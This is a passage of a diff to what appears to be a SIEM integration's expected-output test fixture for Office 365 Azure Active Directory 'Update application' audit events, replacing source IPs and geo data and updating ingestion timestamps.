application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4473,25 +4077,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4505,7 +4091,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4619,7 +4205,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4631,12 +4217,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036207900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124961200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4662,25 +4248,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4694,7 +4262,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4808,7 +4376,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4820,12 +4388,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036214600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124967100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceA